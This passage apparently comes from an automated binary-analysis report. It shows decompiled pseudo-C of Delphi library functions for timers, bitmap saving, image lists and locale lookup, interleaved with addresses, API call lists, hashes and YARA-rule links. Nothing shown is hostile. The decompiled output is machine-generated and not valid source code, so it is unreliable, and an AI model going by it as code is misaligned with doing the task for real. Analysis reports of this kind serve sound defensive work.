                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Cursor
                                                                        • String ID: <$C
                                                                        • API String ID: 3268636600-3423417450
                                                                        • Opcode ID: 179ed4ee4d19abd0baf6d6ed879b91dc92126d894a0e04a2a6289e9d6702bce5
                                                                        • Instruction ID: 53dfb2be38ad3f3824fe0bc66c4258adf9aa410c39980d357e277dc970e496b8
                                                                        • Opcode Fuzzy Hash: 179ed4ee4d19abd0baf6d6ed879b91dc92126d894a0e04a2a6289e9d6702bce5
                                                                        • Instruction Fuzzy Hash: 81C15E34A00219DFDB10DFA9C585A9EB3F1BF44304F1485A6E900EB365D778EE85CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045FE24, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 276timeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E0045FE24(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				signed int _v9;
				signed int _v16;
				signed int _v20;
				char _v21;
				char _v124;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t145;
				intOrPtr _t169;
				intOrPtr _t171;
				intOrPtr _t172;
				intOrPtr _t173;
				signed int _t177;
				signed int _t184;
				intOrPtr _t193;
				signed int _t197;
				signed int _t204;
				intOrPtr _t213;
				intOrPtr _t215;
				signed int _t224;
				signed int _t237;
				signed int _t240;
				void* _t248;
				void* _t252;
				signed int _t253;
				intOrPtr _t268;
				intOrPtr _t284;
				void* _t295;
				signed int _t297;
				intOrPtr _t304;

				_v9 = __ecx;
				_t253 = __edx;
				_v8 = __eax;
				_t294 = _a8;
				_v21 = 0;
				E00460CD8(_v8, __edx, _a8, _t295);
				_t145 = _v8;
				_t305 =  *(_t145 + 0x1c) & 0x00000010;
				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
					L5:
					__eflags = _t253;
					if(_t253 != 0) {
						L8:
						__eflags = _t253;
						if(_t253 != 0) {
							L37:
							_push(0x4601cf);
							_push( *[fs:eax]);
							 *[fs:eax] = _t304;
							E00437B78(_v8, _t253, _a4, _t294);
							_pop(_t268);
							 *[fs:eax] = _t268;
							return 0;
						}
						E0045D74C(_v8,  &_v124);
						_t296 =  *_v8;
						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
						__eflags =  *((char*)(_v8 + 0x28e));
						if(__eflags != 0) {
							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
							if(__eflags == 0) {
								_t296 = 0xffc8;
								_t237 = E004037D8(_v8, __eflags);
								__eflags = _t237;
								if(_t237 != 0) {
									_t240 = E00435FB0(_v8) -  *(_v8 + 0x264);
									__eflags = _t240;
									 *(_v8 + 0x264) = _t240;
								}
							}
							return E0045E140(_v8, _t253,  &_v124, _t294, _t296);
						}
						_t259 = _a4;
						E0045D6F0(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
						_t169 = _v8;
						_t297 = _v20;
						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
							L25:
							_t171 = _v8;
							__eflags =  *(_t171 + 0x249) & 0x00000001;
							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
								L31:
								_t172 = _v8;
								__eflags =  *(_t172 + 0x249) & 0x00000002;
								if(( *(_t172 + 0x249) & 0x00000002) != 0) {
									__eflags = _v16;
									if(_v16 >= 0) {
										_t173 = _v8;
										__eflags =  *((intOrPtr*)(_t173 + 0x23c)) - _v16;
										if( *((intOrPtr*)(_t173 + 0x23c)) > _v16) {
											__eflags =  *((intOrPtr*)(_v8 + 0x238)) - _v20;
											if(__eflags <= 0) {
												_t177 = _v20;
												 *((intOrPtr*)(_v8 + 0x26c)) = _t177;
												 *((intOrPtr*)(_v8 + 0x270)) = _t177;
												E00412BA4(_t294,  &_v132, _a4, _t294, _t297);
												_push( &_v132);
												_t184 = E004037D8(_v8, __eflags);
												__eflags = _t184;
												if(_t184 != 0) {
													 *((char*)(_v8 + 0x28e)) = 5;
													 *((intOrPtr*)( *_v8 + 0x88))();
													E0045E280(_v8, _t253, _t294, 0xffa3);
													_v21 = 1;
													SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
												}
											}
										}
									}
								}
								goto L37;
							}
							__eflags = _v20;
							if(_v20 < 0) {
								goto L31;
							}
							_t193 = _v8;
							__eflags =  *((intOrPtr*)(_t193 + 0x238)) - _v20;
							if( *((intOrPtr*)(_t193 + 0x238)) <= _v20) {
								goto L31;
							}
							__eflags =  *((intOrPtr*)(_v8 + 0x23c)) - _v16;
							if(__eflags > 0) {
								goto L31;
							}
							_t197 = _v16;
							 *((intOrPtr*)(_v8 + 0x26c)) = _t197;
							 *((intOrPtr*)(_v8 + 0x270)) = _t197;
							E00412BA4(_t294,  &_v132, _a4, _t294, _t297);
							_push( &_v132);
							_t204 = E004037D8(_v8, __eflags);
							__eflags = _t204;
							if(_t204 != 0) {
								 *((char*)(_v8 + 0x28e)) = 4;
								 *((intOrPtr*)( *_v8 + 0x88))();
								E0045E280(_v8, _t253, _t294, 0xffa2);
								_v21 = 1;
								SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
							}
							goto L37;
						}
						_t213 = _v8;
						__eflags =  *((intOrPtr*)(_t213 + 0x23c)) - _v16;
						if( *((intOrPtr*)(_t213 + 0x23c)) > _v16) {
							goto L25;
						}
						_t215 = _v8;
						__eflags =  *(_t215 + 0x249) & 0x00000004;
						if(( *(_t215 + 0x249) & 0x00000004) == 0) {
							 *((char*)(_v8 + 0x28e)) = 1;
							SetTimer(E0043CC2C(_v8), 1, 0x3c, 0);
							__eflags = _v9 & 0x00000001;
							if((_v9 & 0x00000001) == 0) {
								E0045EDB8(_v8, _t253, _v16, _t297, _t294, _t297, 1, 1);
							} else {
								E0045ED30(_v8, _t259,  &_v20, _t294);
							}
							goto L37;
						}
						_t284 = _v8;
						_t224 = _v20;
						__eflags =  *((intOrPtr*)(_t284 + 0x228)) - _t224;
						if( *((intOrPtr*)(_t284 + 0x228)) != _t224) {
							L20:
							E0045EDB8(_v8, _t253, _v16, _t224, _t294, _t297, 1, 1);
							E00460DB4(_v8, _t294, _t297);
							L21:
							E004037D8(_v8, __eflags);
							goto L37;
						}
						__eflags =  *((intOrPtr*)(_v8 + 0x22c)) - _v16;
						if(__eflags != 0) {
							goto L20;
						}
						E0045C698(_v8);
						goto L21;
					}
					__eflags = _v9 & 0x00000040;
					if(__eflags == 0) {
						goto L8;
					} else {
						E004037D8(_v8, __eflags);
						goto L37;
					}
				}
				if(E004037D8(_v8, _t305) != 0) {
					L3:
					 *((intOrPtr*)( *_v8 + 0xc0))();
					_t248 = E0045C608(_v8, _t307);
					_t308 = _t248;
					if(_t248 == 0) {
						return E004367E4(_v8, 0, _t308);
					}
					goto L5;
				}
				_t252 = E0044DA34(_v8);
				_t307 = _t252;
				if(_t252 != 0) {
					goto L5;
				}
				goto L3;
			}





































                                                                        0x0045fe2d
                                                                        0x0045fe30
                                                                        0x0045fe32
                                                                        0x0045fe35
                                                                        0x0045fe38
                                                                        0x0045fe3f
                                                                        0x0045fe44
                                                                        0x0045fe47
                                                                        0x0045fe4b
                                                                        0x0045fe8f
                                                                        0x0045fe8f
                                                                        0x0045fe91
                                                                        0x0045feaa
                                                                        0x0045feaa
                                                                        0x0045feac
                                                                        0x004601a5
                                                                        0x004601a8
                                                                        0x004601ad
                                                                        0x004601b0
                                                                        0x004601c0
                                                                        0x004601c7
                                                                        0x004601ca
                                                                        0x00000000
                                                                        0x004601ca
                                                                        0x0045feb8
                                                                        0x0045feed
                                                                        0x0045feef
                                                                        0x0045fef8
                                                                        0x0045feff
                                                                        0x0045ff04
                                                                        0x0045ff0b
                                                                        0x0045ff10
                                                                        0x0045ff14
                                                                        0x0045ff19
                                                                        0x0045ff1b
                                                                        0x0045ff28
                                                                        0x0045ff28
                                                                        0x0045ff31
                                                                        0x0045ff31
                                                                        0x0045ff1b
                                                                        0x00000000
                                                                        0x0045ff3d
                                                                        0x0045ff4f
                                                                        0x0045ff57
                                                                        0x0045ff5c
                                                                        0x0045ff65
                                                                        0x0045ff68
                                                                        0x0045ff6a
                                                                        0x0046002a
                                                                        0x0046002a
                                                                        0x0046002d
                                                                        0x00460034
                                                                        0x004600ee
                                                                        0x004600ee
                                                                        0x004600f1
                                                                        0x004600f8
                                                                        0x004600fe
                                                                        0x00460102
                                                                        0x00460108
                                                                        0x00460111
                                                                        0x00460114
                                                                        0x00460123
                                                                        0x00460126
                                                                        0x0046012b
                                                                        0x0046012e
                                                                        0x00460137
                                                                        0x00460145
                                                                        0x0046014d
                                                                        0x00460167
                                                                        0x0046016c
                                                                        0x0046016e
                                                                        0x00460173
                                                                        0x0046017f
                                                                        0x00460188
                                                                        0x0046018d
                                                                        0x004601a0
                                                                        0x004601a0
                                                                        0x0046016e
                                                                        0x00460126
                                                                        0x00460114
                                                                        0x00460102
                                                                        0x00000000
                                                                        0x004600f8
                                                                        0x0046003a
                                                                        0x0046003e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00460044
                                                                        0x0046004d
                                                                        0x00460050
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046005f
                                                                        0x00460062
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046006b
                                                                        0x0046006e
                                                                        0x00460077
                                                                        0x00460085
                                                                        0x0046008d
                                                                        0x004600a7
                                                                        0x004600ac
                                                                        0x004600ae
                                                                        0x004600b7
                                                                        0x004600c3
                                                                        0x004600cc
                                                                        0x004600d1
                                                                        0x004600e4
                                                                        0x004600e4
                                                                        0x00000000
                                                                        0x004600ae
                                                                        0x0045ff70
                                                                        0x0045ff79
                                                                        0x0045ff7c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ff82
                                                                        0x0045ff85
                                                                        0x0045ff8c
                                                                        0x0045ffe3
                                                                        0x0045fff9
                                                                        0x0045fffe
                                                                        0x00460002
                                                                        0x00460020
                                                                        0x00460004
                                                                        0x0046000a
                                                                        0x0046000a
                                                                        0x00000000
                                                                        0x00460002
                                                                        0x0045ff8e
                                                                        0x0045ff97
                                                                        0x0045ff9a
                                                                        0x0045ff9c
                                                                        0x0045ffb6
                                                                        0x0045ffc2
                                                                        0x0045ffca
                                                                        0x0045ffcf
                                                                        0x0045ffd6
                                                                        0x00000000
                                                                        0x0045ffd6
                                                                        0x0045ffa7
                                                                        0x0045ffaa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0045ffaf
                                                                        0x00000000
                                                                        0x0045ffaf
                                                                        0x0045fe93
                                                                        0x0045fe97
                                                                        0x00000000
                                                                        0x0045fe99
                                                                        0x0045fea0
                                                                        0x00000000
                                                                        0x0045fea0
                                                                        0x0045fe97
                                                                        0x0045fe5b
                                                                        0x0045fe69
                                                                        0x0045fe6e
                                                                        0x0045fe77
                                                                        0x0045fe7c
                                                                        0x0045fe7e
                                                                        0x00000000
                                                                        0x0045fe85
                                                                        0x00000000
                                                                        0x0045fe7e
                                                                        0x0045fe60
                                                                        0x0045fe65
                                                                        0x0045fe67
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 0045FFF9
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 004600E4
                                                                        • SetTimer.USER32(00000000,00000001,0000003C,00000000), ref: 004601A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Timer
                                                                        • String ID: @
                                                                        • API String ID: 2870079774-2766056989
                                                                        • Opcode ID: 88cef14bf29f28469dc2bd1fd5b87344eff30f37b517dbfd76d085cff1a4e1cb
                                                                        • Instruction ID: ca72aae42d446a3379f6ca7453f2662bbf2d4cae35f29f2d7e84bd41c12cedf4
                                                                        • Opcode Fuzzy Hash: 88cef14bf29f28469dc2bd1fd5b87344eff30f37b517dbfd76d085cff1a4e1cb
                                                                        • Instruction Fuzzy Hash: CCC14A34A04208EFDB00DB99C985FDEB7F5AF09304F2441A6E844AB392DB79AF45DB45
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004258E4, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 203COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004258E4(void* __eax, signed int __ecx, intOrPtr* __edx, void* __eflags) {
				void* __ebp;
				signed int _t93;
				void* _t108;
				signed int _t114;
				void* _t125;
				signed int _t140;
				signed int _t146;
				signed int _t160;
				intOrPtr _t197;
				intOrPtr* _t201;
				void* _t202;
				intOrPtr _t204;
				signed int* _t205;

				_t160 = __ecx;
				_t201 = __edx;
				_t202 = __eax;
				E00402EF0( &(_t205[4]), 0xe);
				_t205[4] = 0x4d42;
				_t203 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c));
				if( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c)) != 0) {
					 *_t205 = E0041694C(_t203);
					if(_t160 != 0) {
						E00416B7C(_t201, 4, _t205);
					}
					E0041694C( *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x28)) + 0x6c)));
					return  *((intOrPtr*)( *_t201 + 0xc))();
				}
				E004249D0(_t202, 0xe);
				_t204 =  *((intOrPtr*)(_t202 + 0x28));
				 *_t205 = 0;
				_t93 =  *(_t204 + 0x14);
				__eflags = _t93;
				if(__eflags != 0) {
					 *_t205 =  *_t205 + _t205[2] + 0xe;
					E00402EF0( &(_t205[4]), 0xe);
					_t205[4] = 0x4d42;
					_t125 = E00424894(_t202);
					_t197 =  *0x425b98; // 0x1
					E00420804(_t125, 0, _t197);
					_t205[3] = E00420B28(SelectObject( *( *((intOrPtr*)(_t202 + 0x2c)) + 4),  *(_t204 + 0x14)));
					_t205[1] = GetDIBColorTable( *( *((intOrPtr*)(_t202 + 0x2c)) + 4), 0, 0x100,  &(_t205[0xa]));
					SelectObject( *( *((intOrPtr*)(_t202 + 0x2c)) + 4), _t205[3]);
					_t140 =  *(_t204 + 0x50);
					__eflags = _t140;
					if(_t140 > 0) {
						__eflags = _t140 - _t205[1];
						if(_t140 < _t205[1]) {
							_t205[1] = _t140;
						}
					}
					__eflags =  *((char*)(_t204 + 0x70));
					if( *((char*)(_t204 + 0x70)) == 0) {
						__eflags = _t205[1];
						if(_t205[1] == 0) {
							__eflags =  *(_t204 + 0x10);
							if( *(_t204 + 0x10) != 0) {
								__eflags =  *((char*)(_t204 + 0x71));
								if( *((char*)(_t204 + 0x71)) == 0) {
									_t205[1] = E004212BC( *(_t204 + 0x10), 0xff,  &(_t205[0xa]));
									__eflags =  *((short*)(_t204 + 0x3e)) - 8;
									if( *((short*)(_t204 + 0x3e)) > 8) {
										_t146 = _t205[1] << 2;
										 *_t205 =  *_t205 + _t146;
										_t47 =  &(_t205[2]);
										 *_t47 = _t205[2] + _t146;
										__eflags =  *_t47;
									}
								}
							}
						}
					}
					_t205[4] =  *_t205;
					_t93 = _t205[2] + 0xe;
					__eflags = _t93;
					_t205[6] = _t93;
				}
				__eflags = _t160;
				if(_t160 != 0) {
					_t93 = E00416B7C(_t201, 4, _t205);
				}
				__eflags =  *_t205;
				if( *_t205 == 0) {
					return _t93;
				} else {
					E004239AC(_t204 + 0x18);
					__eflags = _t205[1];
					if(_t205[1] == 0) {
						L27:
						__eflags =  *((char*)(_t204 + 0x70));
						if( *((char*)(_t204 + 0x70)) == 0) {
							E00416B7C(_t201, 0xe,  &(_t205[4]));
							E00416B7C(_t201, 0x28, _t204 + 0x30);
							__eflags =  *((short*)(_t204 + 0x3e)) - 8;
							if( *((short*)(_t204 + 0x3e)) > 8) {
								__eflags =  *(_t204 + 0x40) & 0x00000003;
								if(( *(_t204 + 0x40) & 0x00000003) != 0) {
									E00416B7C(_t201, 0xc, _t204 + 0x58);
								}
							}
						} else {
							_t108 = _t204 + 0x30;
							_t205[7] = 0xc;
							_t205[8] =  *((intOrPtr*)(_t108 + 4));
							_t205[9] =  *((intOrPtr*)(_t108 + 8));
							_t205[9] = 1;
							_t205[0xa].rgbBlue =  *((intOrPtr*)(_t108 + 0xe));
							E00416B7C(_t201, 0xe,  &(_t205[4]));
							E00416B7C(_t201, 0xc,  &(_t205[7]));
						}
						__eflags = 0 * _t205[1];
						E00416B7C(_t201, 0 * _t205[1],  &(_t205[0xa]));
						return E00416B7C(_t201,  *((intOrPtr*)(_t204 + 0x44)),  *((intOrPtr*)(_t204 + 0x2c)));
					}
					_t114 =  *(_t204 + 0x50);
					__eflags = _t114;
					if(_t114 == 0) {
						L24:
						 *(_t204 + 0x50) = _t205[1];
						L25:
						__eflags =  *((char*)(_t204 + 0x70));
						if( *((char*)(_t204 + 0x70)) != 0) {
							E00420F98( &(_t205[0xa]),  &(_t205[1]));
						}
						goto L27;
					}
					__eflags = _t114 - _t205[1];
					if(_t114 == _t205[1]) {
						goto L25;
					}
					goto L24;
				}
			}
















                                                                        0x004258ee
                                                                        0x004258f0
                                                                        0x004258f2
                                                                        0x004258ff
                                                                        0x00425904
                                                                        0x0042590e
                                                                        0x00425913
                                                                        0x0042591c
                                                                        0x00425921
                                                                        0x0042592c
                                                                        0x0042592c
                                                                        0x00425939
                                                                        0x00000000
                                                                        0x00425947
                                                                        0x00425951
                                                                        0x00425956
                                                                        0x0042595b
                                                                        0x0042595e
                                                                        0x00425961
                                                                        0x00425963
                                                                        0x004259a9
                                                                        0x004259b7
                                                                        0x004259bc
                                                                        0x004259c5
                                                                        0x004259ca
                                                                        0x004259d0
                                                                        0x004259ea
                                                                        0x00425a06
                                                                        0x00425a16
                                                                        0x00425a1b
                                                                        0x00425a1e
                                                                        0x00425a20
                                                                        0x00425a22
                                                                        0x00425a26
                                                                        0x00425a28
                                                                        0x00425a28
                                                                        0x00425a26
                                                                        0x00425a2c
                                                                        0x00425a30
                                                                        0x00425a32
                                                                        0x00425a37
                                                                        0x00425a39
                                                                        0x00425a3d
                                                                        0x00425a3f
                                                                        0x00425a43
                                                                        0x00425a56
                                                                        0x00425a5a
                                                                        0x00425a5f
                                                                        0x00425a65
                                                                        0x00425a68
                                                                        0x00425a6b
                                                                        0x00425a6b
                                                                        0x00425a6b
                                                                        0x00425a6b
                                                                        0x00425a5f
                                                                        0x00425a43
                                                                        0x00425a3d
                                                                        0x00425a37
                                                                        0x00425a72
                                                                        0x00425a7a
                                                                        0x00425a7a
                                                                        0x00425a7d
                                                                        0x00425a7d
                                                                        0x00425a81
                                                                        0x00425a83
                                                                        0x00425a8e
                                                                        0x00425a8e
                                                                        0x00425a93
                                                                        0x00425a97
                                                                        0x00425b97
                                                                        0x00425a9d
                                                                        0x00425aa0
                                                                        0x00425aa5
                                                                        0x00425aaa
                                                                        0x00425ad3
                                                                        0x00425ad3
                                                                        0x00425ad7
                                                                        0x00425b33
                                                                        0x00425b42
                                                                        0x00425b47
                                                                        0x00425b4c
                                                                        0x00425b4e
                                                                        0x00425b52
                                                                        0x00425b5e
                                                                        0x00425b5e
                                                                        0x00425b52
                                                                        0x00425ad9
                                                                        0x00425ad9
                                                                        0x00425adc
                                                                        0x00425ae8
                                                                        0x00425af1
                                                                        0x00425af6
                                                                        0x00425b01
                                                                        0x00425b11
                                                                        0x00425b21
                                                                        0x00425b21
                                                                        0x00425b70
                                                                        0x00425b7b
                                                                        0x00000000
                                                                        0x00425b88
                                                                        0x00425aac
                                                                        0x00425aaf
                                                                        0x00425ab1
                                                                        0x00425ab9
                                                                        0x00425abd
                                                                        0x00425ac0
                                                                        0x00425ac0
                                                                        0x00425ac4
                                                                        0x00425ace
                                                                        0x00425ace
                                                                        0x00000000
                                                                        0x00425ac4
                                                                        0x00425ab3
                                                                        0x00425ab7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00425ab7

                                                                        APIs
                                                                        • SelectObject.GDI32(?,?), ref: 004259E0
                                                                        • GetDIBColorTable.GDI32(?,00000000,00000100,?,?,?), ref: 00425A01
                                                                        • SelectObject.GDI32(?,?), ref: 00425A16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ObjectSelect$ColorTable
                                                                        • String ID: BM
                                                                        • API String ID: 2377976745-2348483157
                                                                        • Opcode ID: 8bd2cb56597fdf506e5766ef7ca11344766f88f5d25333770e39b42100c0256a
                                                                        • Instruction ID: 6c74de65949b55c7261e36db3c671f3cf5b5c64a81c24a0a4976f9b404168564
                                                                        • Opcode Fuzzy Hash: 8bd2cb56597fdf506e5766ef7ca11344766f88f5d25333770e39b42100c0256a
                                                                        • Instruction Fuzzy Hash: BC8116707083559BD710EF28D485BAE77E1AF88314F44892EF889CB391D778E985CB4A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00443A2C, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E00443A2C(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v24;
				char _v28;
				intOrPtr _t60;
				void* _t102;
				intOrPtr _t106;
				void* _t112;
				intOrPtr _t126;
				intOrPtr _t141;
				void* _t148;
				void* _t149;
				intOrPtr _t150;

				_t148 = _t149;
				_t150 = _t149 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_v28 = 0;
				_v24 = 0;
				_t112 = __edx;
				_v8 = __eax;
				_push(_t148);
				_push(0x443c43);
				_push( *[fs:eax]);
				 *[fs:eax] = _t150;
				if(E00443514(_v8) == 0) {
					L6:
					E004037D8(_v8, __eflags);
					__eflags = 0;
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x443c4a);
					return E0040436C( &_v28, 2);
				} else {
					E004442B8(_v8, __edx, __ecx, __ecx, __ecx);
					_v12 = E004438EC(_v8, __edx, _a4, __ecx, __ecx);
					if(_v12 == 0xffffffff) {
						_t60 =  *0x4958fc; // 0x41d54c
						E00406548(_t60,  &_v28);
						E0040A17C(_v28, 1);
						E00403DA8();
						goto L6;
					} else {
						 *[fs:eax] = _t150;
						_v16 = E004242CC(1);
						 *[fs:eax] = _t150;
						 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x443bd4, _t148,  *[fs:eax], 0x443bf4, _t148);
						 *((intOrPtr*)( *_v16 + 0x40))();
						_v20 = E004242CC(1);
						 *[fs:eax] = _t150;
						E004256E4(_v20, 1);
						 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x443bb7, _t148);
						 *((intOrPtr*)( *_v20 + 0x40))();
						L00426AD8();
						L00426AD8();
						_push( *((intOrPtr*)( *_v16 + 0x64))( *((intOrPtr*)( *_v20 + 0x64))(E004436E8(_v8), _v12, E00420730(E00424894(_v20)), 0, 0, 0x10, E004436E8(_v8), _v12, E00420730(E00424894(_v16)), 0, 0, 0)));
						_push(_t112);
						_t102 = E004436E8(_v8);
						_push(_t102);
						L00426AE0();
						if(_t102 == 0) {
							_t106 =  *0x4958fc; // 0x41d54c
							E00406548(_t106,  &_v24);
							E0040A17C(_v24, 1);
							E00403DA8();
						}
						_pop(_t141);
						 *[fs:eax] = _t141;
						_push(0x443bbe);
						return E004035DC(_v20);
					}
				}
			}


















                                                                        0x00443a2d
                                                                        0x00443a2f
                                                                        0x00443a32
                                                                        0x00443a33
                                                                        0x00443a36
                                                                        0x00443a39
                                                                        0x00443a3e
                                                                        0x00443a40
                                                                        0x00443a45
                                                                        0x00443a46
                                                                        0x00443a4b
                                                                        0x00443a4e
                                                                        0x00443a5b
                                                                        0x00443c1c
                                                                        0x00443c23
                                                                        0x00443c28
                                                                        0x00443c2a
                                                                        0x00443c2d
                                                                        0x00443c30
                                                                        0x00443c42
                                                                        0x00443a61
                                                                        0x00443a66
                                                                        0x00443a78
                                                                        0x00443a7f
                                                                        0x00443bfe
                                                                        0x00443c03
                                                                        0x00443c12
                                                                        0x00443c17
                                                                        0x00000000
                                                                        0x00443a85
                                                                        0x00443a90
                                                                        0x00443a9f
                                                                        0x00443aad
                                                                        0x00443abb
                                                                        0x00443ac9
                                                                        0x00443ad8
                                                                        0x00443ae6
                                                                        0x00443aee
                                                                        0x00443afe
                                                                        0x00443b0c
                                                                        0x00443b30
                                                                        0x00443b56
                                                                        0x00443b6c
                                                                        0x00443b6d
                                                                        0x00443b71
                                                                        0x00443b76
                                                                        0x00443b77
                                                                        0x00443b7e
                                                                        0x00443b83
                                                                        0x00443b88
                                                                        0x00443b97
                                                                        0x00443b9c
                                                                        0x00443b9c
                                                                        0x00443ba3
                                                                        0x00443ba6
                                                                        0x00443ba9
                                                                        0x00443bb6
                                                                        0x00443bb6
                                                                        0x00443a7f

                                                                        APIs
                                                                          • Part of subcall function 004438EC: 734520C0.COMCTL32(?,00000000,00000000,?,00000000,004439EB), ref: 0044398F
                                                                        • 73452500.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00443BF4,?,00000000,00443C43), ref: 00443B30
                                                                        • 73452500.COMCTL32(00000000,000000FF,00000000,00000000,00000000,00000010,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00443BF4), ref: 00443B56
                                                                        • 73452330.COMCTL32(00000000,?,00000000,?,?,00000000,00443BF4,?,00000000,00443C43), ref: 00443B77
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 73452500$73452073452330LoadString
                                                                        • String ID: DA
                                                                        • API String ID: 579128689-2080325668
                                                                        • Opcode ID: d992737f7190e42f1d92079056fb4a6d15802b062724c07b44b65551e02e38d2
                                                                        • Instruction ID: d8424a2b104fe4f1d5b96f464bae46b84877e40d637dfa1592dbc8658c5b6140
                                                                        • Opcode Fuzzy Hash: d992737f7190e42f1d92079056fb4a6d15802b062724c07b44b65551e02e38d2
                                                                        • Instruction Fuzzy Hash: 79511074A00215EFD700EFA9D892E9DB7F5FF49705F6144A6F800AB761CA35AE00DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409D0C, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 82%
                                                                        			E00409D0C(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x409ed6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00404348(__edx);
				E004099D4(GetThreadLocale(), 0x409eec, 0x1009,  &_v12);
				if(E004087C0(0x409eec, 1, _t128) + 0xfffffffd - 3 < 0) {
